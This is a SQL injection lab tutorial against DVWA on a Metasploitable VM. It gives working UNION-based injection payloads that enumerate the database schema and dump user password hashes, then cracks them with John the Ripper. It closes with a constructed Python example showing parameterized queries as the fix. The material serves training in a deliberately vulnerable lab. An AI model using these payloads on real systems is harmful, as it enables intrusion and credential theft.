SQL Injection Lab PT.1 – Intro/Lab Setup

Sep 23, 2016 04:20 PM
Sep 24, 2016 03:00 AM

In this lab we begin a series on SQL injection. It will be a multi-part article/guide.

  • Let's start with the lab setup (we will see these steps in detail in future posts):

Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.

> Check the IP address of both machines.

Step-by-step instruction

Step 1:

Open Kali Linux (or BT 5r3)

Step 2:

Open your browser and type http://<IP address of Metasploitable>/dvwa/login.php

Step 3:

Log in with user name "admin" and password "password"

Step 4:

Click on DVWA Security, set it to low, then submit

Step 5:

Click on manual SQL injection

Step 6:

In the User ID box type 1 and submit

(PHP select statement: $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";)

Step 7:

%' or '0'='0

(mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';)

Step 8:

Get DB version: %' or 0=0 union select null, version() #

Step 9:

Get DB user: %' or 0=0 union select null, user() #

Step 10:

Get DB name: %' or 0=0 union select null, database() #

Get schema information: %' and 1=0 union select null, table_name from information_schema.tables #

Step 11:

Get the user tables from the schema information: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

Get all the column fields of the users table from information_schema: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

Step 12:

Let's get the password authentication hashes: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

Now copy all the hashes into a text file in the format below

E.g. user:password

Save it to /pentest/passwords/john under the name dvwa_password.txt

Open a console and go to /pentest/passwords/john

cd /pentest/passwords/john

Now launch John the Ripper

./john --format=raw-MD5 dvwa_password.txt and hit Enter.

(You will get the passwords)
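
Why the step 7 input returns every row, and what closes the hole, shown as an added example (not code from DVWA or from this post). In-memory SQLite stands in for DVWA's MySQL, and the function names and sample rows are constructed for illustration.

```python
import sqlite3

# Constructed sample rows; in-memory SQLite stands in for DVWA's MySQL (assumption).
SAMPLE_ROWS = [("1", "Alice", "Admin"), ("2", "Bob", "Builder"), ("3", "Carol", "Clerk")]
STEP7_INPUT = "%' or '0'='0"  # the value typed into the User ID box in step 7

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return db

def lookup_concatenated(db, user_id):
    # Same pattern as the PHP statement in step 6: the input becomes part of the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    query = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(query).fetchall()

def lookup_parameterized(db, user_id):
    # Hardened form: the SQL text is fixed and the input is bound as a value,
    # so quotes in it are compared literally against user_id.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()

def lookup_validated(db, user_id):
    # Defence in depth: a user id is numeric, so reject everything else before querying.
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("user_id must be a plain integer")
    return lookup_parameterized(db, user_id)

if __name__ == "__main__":
    db = make_db()
    for value in ("1", STEP7_INPUT):
        print(repr(value))
        print("  concatenated :", lookup_concatenated(db, value))
        print("  parameterized:", lookup_parameterized(db, value))
```

The same fix in the PHP application is a prepared statement with a bound parameter instead of interpolating $id into the query string.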

….Ok Gurkhas, we'll continue this in the next part.
